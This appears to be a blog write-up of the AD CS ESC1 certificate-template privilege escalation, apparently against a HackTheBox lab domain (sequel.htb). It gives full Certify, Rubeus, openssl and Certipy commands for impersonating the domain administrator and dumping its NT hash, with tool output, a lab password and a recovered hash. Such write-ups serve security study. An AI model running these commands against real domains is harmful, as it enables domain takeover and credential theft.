首页 > 系统相关 >WINDOWS ESC1 escalate privilege

WINDOWS ESC1 escalate privilege

时间:2023-12-29 11:58:14浏览次数:42  
标签:administrator sequel HTB certificate WINDOWS SEQUEL ESC1 escalate pfx

ESC1 utilization conditions:

ESC1 needs to meet following requirements to use successfully

1.Have permission to accquire certificate

2.the value of pkiextendedkeyusage is Client Authentication, Encrypting File System, Secure Email  or smartcard login

3.CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT open

msPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECT

ESC1 Loophole recurrence

CERTIFY / RUBEUS

Certify.exe find /vulnerable

Apply for a certificate for the domain administrator

certify.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator

Copy the cert.pem to kali and use openssl convert them to pfx file

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Enter no password when prompted

Upload the rubeus and cert.pfx to box and apply for TGT

1.inject the ticket 
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:xxx /ptt
2.dump the credential information about account
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /show /nowrap

 Certipy ONLY

An alternative tool to accomplish the same thing is certipy,which is nice because I can run it remotely from my VM.It has a find command that will identify the vulnerable template

certipy find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
...[snip]...
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms 
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

And req allows me to get the .pfx certificate just like I did with Certify.exe and openssl above:

certipy req -u ryan.cooper -p NuclearMosquitor3 -target sequel.htb -upn [email protected] -ca sequel-dc-ca -template UserAuthentication
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

The auth command will take that certificate (administrator.pfx) and get the hash

certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Sync the clock with escape using ntpdate:

sudo ntpdate -u sequel.htb
10 Jun 15:17:27 ntpdate[57100]: step time server 10.10.11.202 offset +28798.724561 sec

Dump the hash

certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

 

标签:administrator,sequel,HTB,certificate,WINDOWS,SEQUEL,ESC1,escalate,pfx
From: https://www.cnblogs.com/lisenMiller/p/17934347.html

相关文章

  • 基于 Windows10 搭建 ELK (Elasticsearch 8 + Kibana + Logstash)
    参考https://www.cnblogs.com/hualess/p/11540477.htmlhttps://blog.csdn.net/susu1083018911/article/details/124551632https://blog.csdn.net/Dyanxier/article/details/131302723https://blog.csdn.net/qq_44768464/article/details/120101990https://www.cnblogs.com......
  • Cisco Secure Client 5.1.1.42 (macOS, Linux, Windows & iOS, Andrord) - VPN 和远程
    CiscoSecureClient5.1.1.42(macOS,Linux,Windows&iOS,Andrord)-VPN和远程访问客户端思科安全客户端(包括AnyConnect)作者主页:sysin.orgCiscoSecureClient(includingAnyConnect)思科安全客户端(包括AnyConnect)安全访问只是开始您的团队需要轻松访问公司资源和私有应......
  • Windows ESC2 escalate privilege
    BRIEFADCS(ActiveDirectorycertificateservice).TherearealotenterpirseCAsetuptoissuecertificatesusingcertificatetemplatedefinitions,whichareacollectionofregistrationpoliciesandpredefinedcertificatesettings,andcontaininformation......
  • Luminar Neo 1.17.0 (macOS, Windows) - 创新 AI 图像编辑器
    LuminarNeo1.17.0(macOS,Windows)-创新AI图像编辑器作者主页:sysin.org你想象中的照片LuminarNeo让您能够表达所见之美什么是LuminarNeo?您是否曾经想通过图像获得更多成就?LuminarNeo是一款创新的图像编辑器,由未来的AI技术提供支持,可简化复杂的编辑程序并使创作者能......
  • Adobe Creative Cloud 2024 (macOS, Windows) 下载汇总 - 创意应用程序
    AdobeCreativeCloud2024(macOS,Windows)-创意应用程序Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD作者主页:sy......
  • Adobe Lightroom Classic v13.1 (macOS, Windows) - 桌面照片编辑器
    AdobeLightroomClassicv13.1(macOS,Windows)-桌面照片编辑器Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD作者......
  • Adobe Illustrator 2024 v28.1 (macOS, Windows) - 矢量绘图
    AdobeIllustrator2024v28.1(macOS,Windows)-矢量绘图Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD作者主页:sys......
  • Adobe Photoshop 2024 v25.3 (macOS, Windows) - 照片和设计软件
    AdobePhotoshop2024v25.3(macOS,Windows)-照片和设计软件Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD请访问......
  • windows 创建自定义url协议 通过浏览器打开cmd
    打开regedit注册表编辑器找到HKEY_CLASSES_ROOT新建如下目录 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------......
  • 在Windows环境下安装xmind
    在Windows环境下安装xmindxmind是什么xmind是一款思维导图软件,应用EclipseRCP软件架构,打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、性能,致力于帮助用户提高生产力。xmind采用Java语言开发,具备跨平台运行的性质、且基于EclipseRCP体系架构,可支持插件,插件通过编......